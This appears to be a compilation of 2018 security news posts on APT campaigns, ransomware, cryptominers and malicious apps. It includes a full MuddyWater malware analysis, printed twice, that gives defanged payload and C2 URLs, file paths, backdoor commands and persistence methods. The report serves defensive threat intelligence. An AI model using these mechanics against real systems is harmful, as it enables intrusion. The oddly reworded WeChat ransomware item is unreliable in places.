According to IBM experts, the spear phishing attack is a favorite technique among cyberthreat groups because it tends to work at least 10 percent of the time. That’s why security training not only has to be in place for all employees, but potentially automated in such a way that laggards can be identified and their use of critical IT systems can be improved.

If that doesn’t suffice, identity and access management (IAM) solutions can help raise the alarm when suspicious-looking documents, such as those sent by SNAKEMACKEREL, make their way into staff inboxes.

Source: Accenture

The post SNAKEMACKEREL Group Uses Brexit-Themed Spear Phishing Attack to Target Government Agencies appeared first on Security Intelligence.

Banks Attacked through Malicious Hardware Connected to the Local Network

Kaspersky is reporting on a series of bank hacks -- called DarkVishnya -- perpetrated through malicious hardware being surreptitiously installed into the target network:

In 2017-2018, Kaspersky Lab specialists were invited to research a series of cybertheft incidents. Each attack had a common springboard: an unknown device directly connected to the company's local network. In some cases, it was the central office, in others a regional office, sometimes located in another country. At least eight banks in Eastern Europe were the targets of the attacks (collectively nicknamed DarkVishnya), which caused damage estimated in the tens of millions of dollars.

Each attack can be divided into several identical stages. At the first stage, a cybercriminal entered the organization's building under the guise of a courier, job seeker, etc., and connected a device to the local network, for example, in one of the meeting rooms. Where possible, the device was hidden or blended into the surroundings, so as not to arouse suspicion.

The devices used in the DarkVishnya attacks varied in accordance with the cybercriminals' abilities and personal preferences. In the cases we researched, it was one of three tools:

  • netbook or inexpensive laptop
  • Raspberry Pi computer
  • Bash Bunny, a special tool for carrying out USB attacks

Inside the local network, the device appeared as an unknown computer, an external flash drive, or even a keyboard. Combined with the fact that Bash Bunny is comparable in size to a USB flash drive, this seriously complicated the search for the entry point. Remote access to the planted device was via a built-in or USB-connected GPRS/3G/LTE modem.

Slashdot thread.

Security Affairs: Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection Chain

Malware researchers at Yoroi – Cybaze Z-Lab analyzed the MuddyWater Infection Chain observed in a last wave of cyber attacks.

Introduction

At the end of November, some Middle East countries have been targeted by a new wave of attacks related to the Iranian APT group known as “MuddyWater“: their first campaign was observed back in 2017 and more recently Unit42 researchers reported attacks in the ME area. The MuddyWater’s TTPs seem to be quite invariant during this time-period: they keep using spear-phishing emails containing blurred document in order to induce the target to enable the execution of VB-macro code, to infect the host with POWERSTAT malware.

Figure 1. Malicious document

According to the analysis of ClearSky Research Team and TrendMicro researchers, at the end of November, MuddyWater group hit Lebanon and Oman institutions and after a few days Turkish entities. The attack vector and the final payload of were the same: the usual macro-embedded document and the POWERSTAT backdoor respectively.

However, the intermediate stages were slightly different than usual.

The Yoroi-Cybaze Zlab researchers analyzed the file “Cv.doc”, the blurred resume used by MuddyWater during their Lebanon/Oman campaign.

Technical Analysis

When the victim enables the MACRO execution, the malicious code creates an Excel document containing the necessary code to download the next-stage of the malicious implant. At the same time, it shows a fake error popup saying the Office version is incompatible.

Figure 2. Fake error message

The macro code is decrypted before the execution with the following custom routine:

Figure 3. Macro decryption routine

After the deobfuscation of the code, it’s possible to identify the function used to create the hidden Excel document within the “x1” variable:

Figure 4. Creation of the hidden document

The macro placed into the new Excel downloads powershell code from an URL apparently referencing a PNG image file “http://pazazta[.]com/app/icon.png”. The downloaded payload is able to create three new local files:

  • C:\Windows\Temp\temp.jpg, containing Javascript code;
  • C:\Windows\Temp\Windows.vbe, containing an encoded Visual Basic script;
  • C:\ProgramData\Microsoft.db, containing the encrypted final payload.
Figure 5. Downloaded Powershell code

As shown in the above figure, the first file to be executed is “Windows.vbe” which simply run the Javascript code contained into temp.jpg, using the CSCRIPT engine. After its decryption, it is possible to notice the JS purpose: delay the execution of another powershell payload.

Figure 6. Javascript code within “temp.jpg”

In fact, the next malicious stage is executed only when the “Math.round(ss) % 20 == 19” condition is met, otherwise it keeps re-executing itself. The “ss” variable stores the past seconds since 1 January 1970 00:00:00.

The final stage consists in the execution of the POWERSTATS backdoor contained into the “Microsoft.db” file. The backdoor contacts a couple of domain names: “hxxp://amphira[.com” and “hxxps://amorenvena[.com”, each one pointing to the same ip address 139.162.245.200 (EU-LINODE-20141229 US).

Figure 7. POWERSTAT beaconing requests

One executed, the POWERSTAT malware sends generic information about the victim’s machine to the remote server through an encoded HTTP POST request:

Figure 8. Post request containing info about the victim machine

Then, it starts its communication protocol with the C2, asking for commands to execute on the compromised host.

The HTTP parameter “type” classifies the kind request performed by the malicious implant, during the analysis the following values have been observed:

  • info: used in POST request to send info about the victim;
  • live: used in POST request as ping mechanism;
  • cmd: used both in POST and GET requests. In the first case it sends the last command executed, in the second one it retrieves a new command from server;
  • res: used in a POST request to send the result of the last command that the malware has executed.

The parameter “id”, instead, uniquely identify the victim machine and it is calculated using the local system info, despite the sample analyzed by TrendMicro which uses only the hard drive serial number.  This identifier is also used to create a file into the “C:\ProgramData\” folder, used to store temporary information.

Figure 9. Victim id creation

Analyzing the code extracted and deobfuscated from the “Microsoft.db” file, it is possible to investigate the real capabilities of the POWERSTATS backdoor, identifying the functionalities supported by a malicious implant, such as:

  • upload: the malware downloads a new file from the specified URL;
  • cmd: the malware executes the specified command;
  • b64: the malware decodes and executes a base64 PowerShell script;
  • muddy: the malware creates a new encrypted file in “C:\\ProgramData\LSASS” containing a powershell script and runs it.
Figure 10. Deobfuscated POWERSTATS code snippet

Persistence

The malware implements more than one persistence mechanism. These mechanisms are triggered only in the final stage of the infection, once the POWERSTATS backdoor is executed. The persistence functionalities use simple and known techniques such as redundant registry keys within the “Microsoft\Windows\CurrentVerison\Run” location:

Figure 11. Registry key based persistence mechanism

And the creation of a scheduled task named “MicrosoftEdge”, started every day at 12 o’clock.

Figure 12. Scheduled task installed by the malware

Conclusion

This last campaign of the Iranian ATP group “MuddyWater“ shows a clear example of how hacking groups can leverage system’s tools and scripting languages to achieve their objectives, maintain a foothold within their target hosts and exfiltrate data. These attacks also leverage macro-embedded document as the initial vector, showing how this “well-known” technique can still represent a relevant threat, especially if carefully prepared and contextualized to lure specific victims.

Figure 13.  MuddyWaters’ Infection chain 

Technical details, including Indicator of compromise and Yara rules are reported in the analysis published on the Yoroi blog.https://blog.yoroi.company/research/dissecting-the-muddywater-infection-chain/

Pierluigi Paganini

(Security Affairs – MuddyWater, APT)

The post Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection Chain appeared first on Security Affairs.



Security Affairs

Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection Chain

Malware researchers at Yoroi – Cybaze Z-Lab analyzed the MuddyWater Infection Chain observed in a last wave of cyber attacks.

Introduction

At the end of November, some Middle East countries have been targeted by a new wave of attacks related to the Iranian APT group known as “MuddyWater“: their first campaign was observed back in 2017 and more recently Unit42 researchers reported attacks in the ME area. The MuddyWater’s TTPs seem to be quite invariant during this time-period: they keep using spear-phishing emails containing blurred document in order to induce the target to enable the execution of VB-macro code, to infect the host with POWERSTAT malware.

Figure 1. Malicious document

According to the analysis of ClearSky Research Team and TrendMicro researchers, at the end of November, MuddyWater group hit Lebanon and Oman institutions and after a few days Turkish entities. The attack vector and the final payload of were the same: the usual macro-embedded document and the POWERSTAT backdoor respectively.

However, the intermediate stages were slightly different than usual.

The Yoroi-Cybaze Zlab researchers analyzed the file “Cv.doc”, the blurred resume used by MuddyWater during their Lebanon/Oman campaign.

Technical Analysis

When the victim enables the MACRO execution, the malicious code creates an Excel document containing the necessary code to download the next-stage of the malicious implant. At the same time, it shows a fake error popup saying the Office version is incompatible.

Figure 2. Fake error message

The macro code is decrypted before the execution with the following custom routine:

Figure 3. Macro decryption routine

After the deobfuscation of the code, it’s possible to identify the function used to create the hidden Excel document within the “x1” variable:

Figure 4. Creation of the hidden document

The macro placed into the new Excel downloads powershell code from an URL apparently referencing a PNG image file “http://pazazta[.]com/app/icon.png”. The downloaded payload is able to create three new local files:

  • C:\Windows\Temp\temp.jpg, containing Javascript code;
  • C:\Windows\Temp\Windows.vbe, containing an encoded Visual Basic script;
  • C:\ProgramData\Microsoft.db, containing the encrypted final payload.
Figure 5. Downloaded Powershell code

As shown in the above figure, the first file to be executed is “Windows.vbe” which simply run the Javascript code contained into temp.jpg, using the CSCRIPT engine. After its decryption, it is possible to notice the JS purpose: delay the execution of another powershell payload.

Figure 6. Javascript code within “temp.jpg”

In fact, the next malicious stage is executed only when the “Math.round(ss) % 20 == 19” condition is met, otherwise it keeps re-executing itself. The “ss” variable stores the past seconds since 1 January 1970 00:00:00.

The final stage consists in the execution of the POWERSTATS backdoor contained into the “Microsoft.db” file. The backdoor contacts a couple of domain names: “hxxp://amphira[.com” and “hxxps://amorenvena[.com”, each one pointing to the same ip address 139.162.245.200 (EU-LINODE-20141229 US).

Figure 7. POWERSTAT beaconing requests

One executed, the POWERSTAT malware sends generic information about the victim’s machine to the remote server through an encoded HTTP POST request:

Figure 8. Post request containing info about the victim machine

Then, it starts its communication protocol with the C2, asking for commands to execute on the compromised host.

The HTTP parameter “type” classifies the kind request performed by the malicious implant, during the analysis the following values have been observed:

  • info: used in POST request to send info about the victim;
  • live: used in POST request as ping mechanism;
  • cmd: used both in POST and GET requests. In the first case it sends the last command executed, in the second one it retrieves a new command from server;
  • res: used in a POST request to send the result of the last command that the malware has executed.

The parameter “id”, instead, uniquely identify the victim machine and it is calculated using the local system info, despite the sample analyzed by TrendMicro which uses only the hard drive serial number.  This identifier is also used to create a file into the “C:\ProgramData\” folder, used to store temporary information.

Figure 9. Victim id creation

Analyzing the code extracted and deobfuscated from the “Microsoft.db” file, it is possible to investigate the real capabilities of the POWERSTATS backdoor, identifying the functionalities supported by a malicious implant, such as:

  • upload: the malware downloads a new file from the specified URL;
  • cmd: the malware executes the specified command;
  • b64: the malware decodes and executes a base64 PowerShell script;
  • muddy: the malware creates a new encrypted file in “C:\\ProgramData\LSASS” containing a powershell script and runs it.
Figure 10. Deobfuscated POWERSTATS code snippet

Persistence

The malware implements more than one persistence mechanism. These mechanisms are triggered only in the final stage of the infection, once the POWERSTATS backdoor is executed. The persistence functionalities use simple and known techniques such as redundant registry keys within the “Microsoft\Windows\CurrentVerison\Run” location:

Figure 11. Registry key based persistence mechanism

And the creation of a scheduled task named “MicrosoftEdge”, started every day at 12 o’clock.

Figure 12. Scheduled task installed by the malware

Conclusion

This last campaign of the Iranian ATP group “MuddyWater“ shows a clear example of how hacking groups can leverage system’s tools and scripting languages to achieve their objectives, maintain a foothold within their target hosts and exfiltrate data. These attacks also leverage macro-embedded document as the initial vector, showing how this “well-known” technique can still represent a relevant threat, especially if carefully prepared and contextualized to lure specific victims.

Figure 13.  MuddyWaters’ Infection chain 

Technical details, including Indicator of compromise and Yara rules are reported in the analysis published on the Yoroi blog.https://blog.yoroi.company/research/dissecting-the-muddywater-infection-chain/

Pierluigi Paganini

(Security Affairs – MuddyWater, APT)

The post Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection Chain appeared first on Security Affairs.

Hackers conducting botnet attacks through 20k hacked WordPress sites

By Uzair Amir

A newly published research from Defiant, a WordPress security firm, reveals that there is a botnet hunting for WordPress sites using over 20,000 already compromised WordPress sites. As the new sites are infected, these automatically become part of the bot army and start acting on the directions of the attackers to perform tasks like brute […]

This is a post from HackRead.com Read the original post: Hackers conducting botnet attacks through 20k hacked WordPress sites

New Macro Downloaders Use PUB Files to Compromise Food and Retail Companies

New macro downloaders are using Microsoft Publisher (PUB) files and spam emails to serve up network compromise in the food and retail sectors.

According to Trend Micro, the campaign ramped up late last month with over 50 food and retail companies spammed between Nov. 20–27. Targets included food sector companies Starbucks and Taco Del Mar and retailers Harris Teeter and Save Mart Supermarkets. Trend Micro also detected attacks against the U.S. Department of Agriculture and the financial sector dating to the first week in November.

Setting this campaign apart is its use of PUB files, which are not commonly associated with macro malware. Combined with socially engineered spam emails from “operations teams,” these PUB invoices appear legitimate. Once opened, they serve up malicious Microsoft Installer (MSI) files that contact command-and-control (C&C) servers to install remote access Trojans (RATs). Given the lack of PUB files used by macro downloaders and the use of MSI files for legitimate installations, infections may go unnoticed by both users and standard antimalware tools.

Spam Is a Recipe for Disaster During the Holidays

Both retail and food companies are gearing up for their busiest quarter of the year, which could increase their likelihood of falling victim to spam attacks. Cybercriminals’ use of PUB files enhances this risk, since employees may not recognize these files as potential threats. Intalled RATs can then hide in plain sight until attackers are ready to conduct reconnaissance or download new malware tools.

The campaign also prioritizes evasion by scheduling the MSI file download rather than completing it immediately after PUB files are opened. This not only delays infection to confound security measures, but assigns “msiexec” to scheduler processes, allowing it to be automatically downloaded and installed.

Address the Threat of Macro Downloaders and PUB Attacks

Seasonal spam campaigns come with a high price: Lurking RATs could target customer data or compromise corporate networks. To avoid sneaky PUB attacks, IBM experts recommend invest in layered email security services that combine perimeter protection, external mail scanning and spam control. Security teams should also segment their networks to separate critical services, point-of-sale (POS) information and consumer financial data and limit the damage caused by successful spam deliveries.

Source: Trend Micro

The post New Macro Downloaders Use PUB Files to Compromise Food and Retail Companies appeared first on Security Intelligence.

Sednit Threat Group Adds Delphi Dropper and Mail Downloader to Zebrocy Toolset

The Sednit threat group recently added a Delphi dropper and mail downloader to its Zebrocy tool set of downloaders, droppers and backdoors.

Researchers from ESET detected a new phishing campaign distributing the malware. The operation begins with a Delphi dropper that, once activated, loads and executes an Ultimate Packer for Executables (UPX)-packed Microsoft Intermediate Language (MSIL) downloader. This downloader gathers more than a dozen pieces of information and sends them to the attackers via email to retrieve a Delphi mail downloader.

A new addition to Zebrocy distribution campaigns, the Delphi mail downloader enables Sednit to assess the importance of an infected machine. The attackers then proceed with the campaign using the Delphi mail downloader to exfiltrate data and retrieve commands from the operator via emails and passwords. The mail downloader ultimately drops a Delphi downloader, which is responsible for executing the final Delphi backdoor payload.

Zebrocy: A Brief History

According to ESET, Sednit has been distributing the Zebrocy malware since at least 2016. In those operations, the family consisted largely of three components: a Delphi downloader, an AutoIt downloader and a Delphi backdoor. In some cases, the threat group omitted the Delphi downloader entirely.

Sednit’s decision to start a campaign with a dropper and use a Delphi mail downloader marks a new stage of delivery for its toolset; so does its decision to use the same weaponized documents for distributing multiple payloads. Palo Alto Networks witnessed this firsthand when it observed a campaign distributing Zebrocy and Cannon, a new first-stage payload that uses email as its command-and-control (C&C) communication channel.

How to Defend Against Threat Groups Like Sednit

Security professionals can help defend their organizations against phishing attacks by taking a layered approach to email security that involves mail scanning, perimeter protection and antispam measures. They should also invest in awareness training for all employees.

Sources: ESET, ESET(1), Palo Alto Networks

The post Sednit Threat Group Adds Delphi Dropper and Mail Downloader to Zebrocy Toolset appeared first on Security Intelligence.

From attacking IoT devices to Linux servers. Mirai is back!

From attacking IoT devices to Linux servers. Mirai is back!

One of the downsides of the inexorable march towards a highly connected society is the fact that cybersecurity risks are growing exponentially. As the number of Internet connected devices increases, so does the number of things that we are able to do digitally. But it also means that there is more risk of someone being able to access the information stored on our devices and harm us in some way, especially in a business environment.

In this sense, the Internet of Things (IoT) is one of the most recent targets for cyberattackers. This is for two reasons: firstly, because it is still in the early stages of being adopted by companies and users, and so fascination with these services may be overriding cybersecurity implementation. Secondly, because this exponential opening up of points of entry to information is turning every connected device into another trophy in the cybercriminals’ cabinets.

Until recently the IoT had a powerful enemy: Mirai, a botnet that remotely controlled connected devices, and which could carry out denial of services (DDoS) attacks, like the one seen in 2016 on Dyn, the provider for Twitter, Amazon and Netflix, among many other platforms.

Mirai, going after Linux

We all believed that Mirai’s attack threshold was limited to IoT devices. But it seems to be that its range of possibilities is much wider than could have been imagined. According to The Register, cybercriminals are beginning to turn to Mirai to open a new flank for cyberattacks: devices equipped with Linux.

It all seems to begin with Hadoop YARN, the open source software structure that is able to store an immense amount of data. According to the Netscout experts who have analyzed the matter, Hadoop contains a vulnerability that allows cybercriminals, with enough resources, to be able to access the system and retain the information on each device or network of devices.

How do these attacks work? Mirai exploits the interconnection between bots to indiscriminately get in on a large scale, with one clear objective: installing malware on all the devices that is can access. And though it seems to be a relatively small group of attackers, the fact is that, according to the experts, using Mirai on Linux is much simpler than using it on Internet of things devices. This means that these cyberattacks show a potential that leads us to believe that we could see an increase in this kind of attack in the short to medium term.

And this is no trifling matter: according to Pascal Greenens from Radware, the Hadoop vulnerability YARN is causing around 350,000 attempted attacks every day. This means that both companies’ and private users’ cybersecurity may be seriously at risk.

How to protect yourself against Mirai?

To avoid being fodder for these cyberattacks, companies must be aware of the dangers that they face, and put into place (or update) the defense strategies needed to avoid or mitigate damage.

1.- Cyber-resilience. We repeat this point quite often, but it is vital: a lack of cyber-resilience is one of the worst enemies of corporate cybersecurity. In a world that is constantly in motion, the strategies used by cybercriminals are always growing, becoming more sophisticated, and changing parameters, so every company must be up to speed with the new trends that are being used.

2.- Monitoring. The best way to avoid danger is to know what is happening in the company’s IT structure at every moment. Companies must therefore select technology solutions that perform this task. In this sense, Panda Adaptive Defense automatically monitors all processes that are running on the system, in real time. This means that it is capable of detecting anomalous situations and thus predicting cyberattacks before their definitive arrival, in order to stop them completely.

3.- Reaction protocol. At times, some companies can’t help being affected by the arrival of a cyberattack. In that case, if this moment comes, they must have an urgent action protocol in place that firstly closes all possible points of entry while the focus of the infection is located, and then totally removes the malware from the system to avoid intrusions or leaking of confidential data.

Combining these three actions is the best way to combat Mirai, both in the version that targets IoT devices and in the new form that it has adopted to attack Linux servers.

The post From attacking IoT devices to Linux servers. Mirai is back! appeared first on Panda Security Mediacenter.

Linux Rabbit and Rabbot Malware Leveraged to Install Cryptominers

Digital attackers used new malware called “Linux Rabbit” and “Rabbot” to install cryptominers on targeted devices and servers. In August 2018, researchers at Anomali Labs came across a campaign where Linux Rabbit targeted Linux servers located in Russia, South Korea, the United Kingdom and the United States. The malware began by using Tor hidden services […]… Read More

The post Linux Rabbit and Rabbot Malware Leveraged to Install Cryptominers appeared first on The State of Security.

Old and new OpenSSH backdoors threaten Linux servers

OpenSSH, a suite of networking software that allows secure communications over an unsecured network, is the most common tool for system administrators to manage rented Linux servers. And given that over one-third of public-facing internet servers run Linux, it shouldn’t come as a surprise that threat actors would exploit OpenSSH’s popularity to gain control of them. How big and widespread is the threat? Nearly five years ago, ESET researchers helped to disrupt a 25 thousand-strong … More

The post Old and new OpenSSH backdoors threaten Linux servers appeared first on Help Net Security.

Klickbetrug mit Gewinnoptimierung: Android-Apps tarnen sich als iPhone-Programme

Profitsteigerung ist eine der Maximen jedes Cyberkriminellen. Da wundert es nicht, dass die SophosLabs nun eine neue Machenschaft aufgedeckt haben, die auf der Tatsache beruht, dass Werbetreibende mehr Geld pro Klick zahlen, wenn dieser von vermeintlich wohlhabenderen iPhone- oder iPad-Besitzern kommt. Da der sogenannte Klickbetrug, bei dem kommerzielle Werbeflächen geklickt oder Klicks zur Manipulation der […]

415,000 routers infected by cryptomining malware – Prime target MikroTik

By Waqas

According to a new report, around 415,000 routers throughout the world are infected with malware having the potential to steal computer resources and discreetly mine for the cryptocurrency. The campaign is an active one and it primarily targets MikroTik routers. Researchers claim that the cryptojacking attacks started in August and in the first string of […]

This is a post from HackRead.com Read the original post: 415,000 routers infected by cryptomining malware – Prime target MikroTik

New Ransomware Strain Hits the Chinese Web; Infects 100K PCs




More than 100,000 Chinese users have had their Windows PCs infected with yet another strain of ransomware that encodes their records and files all the while requesting a 110 yuan (~$16) ransom. The inadequately composed ransomware is known to have been scrambling local documents and taking credentials for various Chinese online services.

As of now there has been no threat made to international users as the ransomware is only determined to focusing on the Chinese web only.

The individual or the group behind the activity are only utilizing Chinese-themed applications to appropriate the ransomware by means of local sites and discussions at the same time asking for ransom payments through the WeChat payment service, just accessible in China and the contiguous areas.


A report from Chinese security firm Huorong, the malware, named 'WeChat Ransom' in a few reports, came into existence on December 1 and the quantity of infected systems has developed to more than 100,000 as of December 4.

Security specialists who analysed the attack said that other than encoding records, the ransomware additionally incorporated an information-stealing component that collected login credentials for a few Chinese online services, like Alipay, Baidu Cloud, NetEase 163, Tencent QQ, and Taobao, Tmall, and Jingdong.

Chinese security organizations examining the malware concur that it is a long way from a complex risk that can be effortlessly defeated. Although it professes to delete the decryption key if the victim neglects to pay the ransom by a specific date, document recuperation is as yet conceivable in light of the fact that the key is hardcoded in the malware.

Specialists from Huorong examining this ransomware string have found a name, a cell phone number, a QQ account, and an email address that could enable police to identify and catch the thief.

This most recent ransomware campaign anyway is additionally not the first occasion when those Chinese-based ransomware creators have utilized WeChat as a ransom payment dealing strategy. The ones who committed this deadly error in the past have been captured by the officials within months.

The Chinese police, in general, have a decent reputation of capturing the hackers within weeks or months after a specific malware crusade stands out as truly newsworthy.

KingMiner Maxes Out Windows Server CPUs in Widespread Cryptomining Campaign

Researchers spotted a new cryptomining threat conducting brute-force attacks using 100 percent of Internet Information Services IIS/Structured Query Language (SQL) Microsoft Windows servers’ compute resources.

The malware, called KingMiner, is designed not to steal information but to harvest cryptocurrencies such as Monero, which require considerable processing power to crunch through the mathematical calculations behind them, according to researchers at Check Point.

KingMiner was first discovered this past June, but it has since spawned a new variant with even stronger cryptomining features that is now active in the wild.

Cryptomining Campaign Drains CPUs

Once it identifies its target, KingMiner attempts to guess the system’s password, then downloads and executes a Windows scriptlet file. In some cases, the malware is already active on the system, in which case the new version kills off its predecessor. Israel, Norway, Mexico and India are among the locations where the cryptomining campaign has successfully infected Windows machines, according to the researchers.

KingMiner uses a file called XMRig to mine Monero. Although it was designed to use up only 75 percent of a victim’s machine, in practice, it drains the entire capacity of the central processing unit (CPU) due to coding errors.

The cybercriminals behind KingMiner also take pains to avoid detection. By avoiding any public mining pools with its cryptocurrency wallet and turning off the application programming interface (API), for instance, it’s difficult to know how much Monero it has harvested so far. Emulation attempts, meanwhile, are bypassed through an XML file that has been disguised as a ZIP file within the payload. Additional evasion techniques include exporting functions and adding content to the executable’s dynamic link library (DLL) files.

How to Keep Cryptomining Malware at Bay

The researchers noted that KingMiner is likely to continue its evolution based on placeholders they found in the code for future updates and versions.

Cybercriminals are increasingly interested in mining cryptocurrency it requires less social engineering and malware can run quietly in the background. Eliminating threats such as KingMiner depends on widespread adoption of security information and event management (SIEM) technology and improved network endpoint protection.

Source: Check Point

The post KingMiner Maxes Out Windows Server CPUs in Widespread Cryptomining Campaign appeared first on Security Intelligence.

Malicious Chrome extension which sloppily spied on academics believed to originate from North Korea

Computer users are being reminded once again to take care over the browser extensions they install after security experts discovered a hacking campaign that has been targeting academic institutions since at least May 2018.

The post Malicious Chrome extension which sloppily spied on academics believed to originate from North Korea appeared first on The State of Security.

New Adobe Flash Zero-Day Exploit Found Hidden Inside MS Office Docs

Cybersecurity researchers have discovered a new zero-day vulnerability in Adobe Flash Player that hackers are actively exploiting in the wild as part of a targeted campaign appears to be attacking a Russian state health care institution. The vulnerability, tracked as CVE-2018-15982, is a use-after-free flaw resides in Flash Player that, if exploited successfully, allows an attacker to execute

DHS and FBI published a joint alert on SamSam Ransomware

The US Department of Homeland Security (DHS) and the FBI issued a joint alert on SamSam attacks targeting critical infrastructure.

The US Department of Homeland Security (DHS) and the FBI published a joint alert on the activity associated with the infamous SamSam ransomware.

The SamSam hackers extorted over 200 organizations, including public institutions, municipalities, and hospitals, they have caused over $30 million in losses.

In March 2018, computer systems in the City of Atlanta were infected by ransomware, the cyber attack was confirmed by the City officials.

The ransomware infection has caused the interruption of several city’s online services, including “various internal and customer-facing applications” used to pay bills or access court-related information.

One of the latest attacks hit the port of San Diego in September,  the incident impacted the processing park permits and record requests, along with other operations.

In February, SamSam ransomware infected over 2,000 computers at the Colorado Department of Transportation (DOT), the DOT has shut down the infected workstations.

In August, Sophos security firm published a report the SamSam ransomware, its experts tracked Bitcoin addresses managed by the crime gang and discovered that crooks had extorted nearly $6 million from the victims since December 2015 when it appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015.
74% of the known victims are based in the United States. Other regions known to have
suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a
significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses reported in all the SamSam versions it has spotted and discovered that 233 victims paid an overall amount of $5.9 million, the security firm also estimated that the group is netting around $300,000 per month.

A few days ago, the U.S. DoJ charged two Iranian men, Faramarz Shahi Savandi (34) and Mohammad Mehdi Shah Mansouri (27), over their alleged role in creating and spreading the infamous SamSam ransomware.

According to the joint report, most of the victims were located in the United States.

“The SamSam actors targeted multiple industries, including some within critical infrastructure. Victims were located predominately in the United States, but also internationally.” reads the alert.

“Network-wide infections against organizations are far more likely to garner large ransom payments than infections of individual systems. Organizations that provide essential functions have a critical need to resume operations quickly and are more likely to pay larger ransoms.”

SamSam actors leverage vulnerabilities in Windows servers to gain persistent access to the target network and make lateral movements to infect other hosts on the network.

According to the report, attackers used the JexBoss Exploit Kit to compromise JBoss applications. Threat actors use Remote Desktop Protocol (RDP) to gain persistent access to victims’ networks, they use brute force attacks and stolen login credentials.

After obtaining access to the victim’s network, attackers escalate privileges then they drop and execute the malware.

“After gaining access to a particular network, the SamSam actors escalate privileges for administrator rights, drop malware onto the server, and run an executable file, all without victims’ action or authorization. While many ransomware campaigns rely on a victim completing an action, such as opening an email or visiting a compromised website, RDP allows cyber actors to infect victims with minimal detection.” continues the alert.

According to the experts, attackers used stolen RDP credentials that were bought from darknet marketplaces. and used in attacks within hours of purchasing the credentials.

The alert also technical details and the following recommendations to mitigate the threat:

  • Audit your network for systems that use RDP for remote communication. Disable the service if unneeded or install available patches. Users may need to work with their technology venders to confirm that patches will not affect system processes.
  • Verify that all cloud-based virtual machine instances with public IPs have no open RDP ports, especially port 3389, unless there is a valid business reason to keep open RDP ports. Place any system with an open RDP port behind a firewall and require users to use a virtual private network (VPN) to access that system.
  • Enable strong passwords and account lockout policies to defend against brute force attacks.
  • Where possible, apply two-factor authentication.
  • Regularly apply system and software updates.
  • Maintain a good back-up strategy.
  • Enable logging and ensure that logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.
  • When creating cloud-based virtual machines, adhere to the cloud provider’s best practices for remote access.
  • Ensure that third parties that require RDP access follow internal policies on remote access.
  • Minimize network exposure for all control system devices. Where possible, disable RDP on critical devices.
  • Regulate and limit external-to-internal RDP connections. When external access to internal resources is required, use secure methods such as VPNs. Of course, VPNs are only as secure as the connected devices.
  • Restrict users’ ability (permissions) to install and run unwanted software applications.
  • Scan for and remove suspicious email attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.

Pierluigi Paganini

(Security Affairs – SamSam ransomware, hacking)

The post DHS and FBI published a joint alert on SamSam Ransomware appeared first on Security Affairs.

Smashing Security #107: Sextorting the US army, and a Touch ID scam

Smashing Security #107: Sextorting the US army, and a Touch ID scam

Fitness apps exploit TouchID through a sneaky user interface trick, tech giants claim to have a plan to banish passwords, and you won’t believe who was behind a sextortion scam that targeted over 400 members of the US military.

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by ferret-loving ethical hacker Zoë Rose.

Threat Actors Use Malspam Campaign to Target Italian Users With sLoad Downloader

Security researchers identified a malspam campaign targeting Italian users with a variant of the sLoad downloader.

In October and November, CERT-Yoroi detected a series of malicious email messages that shared common techniques. Each malicious sample arrived as a compressed ZIP archive containing two files: an LNK file pretending to point to a system folder and a hidden JPEG image stored with HA attributes.

When a user clicks on the link, the file uses a batch script to run a PowerShell script, which searches for another ZIP file. If it exists, the PowerShell script extracts code from that file and uses it to download other scripts. Among those other scripts are “NxPgKLnYEhMjXT.ps1,” which installs the sLoad implant on the victim’s machine.

Successful execution enables sLoad to collect information about the infected computer and periodically capture screenshots, among other functionality. It then sends this data to attackers via command and control (C&C) channels before receiving additional PowerShell code, behavior that is characteristic of Trojans and spyware.

sLoad: The Latest PowerShell-Borne Threat

This isn’t the first time that security researchers have detected attacks utilizing sLoad. In May 2018, the SANS Internet Storm Center (ISC) identified a PowerShell script targeting customers of major U.K. banks. Further analysis tied this activity to hxxps://cflfuppn[.]eu/sload/run-first.ps1.

Together, these campaigns targeting Italian and U.K. users represent the latest activity of just one threat delivered by PowerShell scripts. IBM X-Force Incident Response and Intelligence Services (IRIS) observed an increase in PowerShell attacks between 2017 and 2018. This finding coincides with Symantec’s detection of a 661 percent increase in the number of computers registering blocked PowerShell activity between mid-2017 and mid-2018.

How Security Professionals Can Block a Malspam Campaign

Security professionals can help defend their organizations against malspam campaigns by investing in awareness training that instructs employees to avoid suspicious links and email attachments. IBM X-Force IRIS also recommends using physical security controls to block the abuse of PowerShell scripts, and integrating security information and event management (SIEM) and endpoint detection and response (EDR) tools to provide an additional layer of protection.

Sources: Yoroi, SANS ISC, Symantec

The post Threat Actors Use Malspam Campaign to Target Italian Users With sLoad Downloader appeared first on Security Intelligence.

Fake Voice Apps Emerge in Google Play Store

Fake voice apps have been spotted on Google Play, and researchers suggested that more could be on the way.

As reported by Trend Micro, multiple malicious voice communication and messaging apps have been spotted on Google Play in the last month. While they appear legitimate at first glance, these messaging platforms leverage modular downloaders to contact command-and-control (C&C) servers, obtain payloads and serve up fake surveys designed to steal user data. They’re lightweight and minimally invasive, reducing the chance of detection by users or device security systems.

Once installed, the app contacts a C&C server for its payload. This contains an “Icon” module that hides the application’s actual icon to subvert uninstall attempts, and a “Wpp” module that opens arbitrary browser URLs and allows the malware to generate fake surveys intended to capture personal information such as names, phone numbers and home addresses. In addition, these apps contain a dynamic library module called “Socks” that integrates with Ares-C. While the researchers didn’t see Socks in action, they believe it may be a developing feature for use in new malware iterations.

Based on code similarities, Trend Micro believes these fake apps have the same authors and suggested that, despite Google’s removal of these apps from the Play Store, more are likely on the way as malware makers discover better ways to obscure malicious code.

What Is the Impact to Users?

For users, the immediate impact of these fake voice apps is having to deal with random URLs and persistent fake surveys. Uninstallation is also frustrating, since the applications take steps to prevent easy removal.

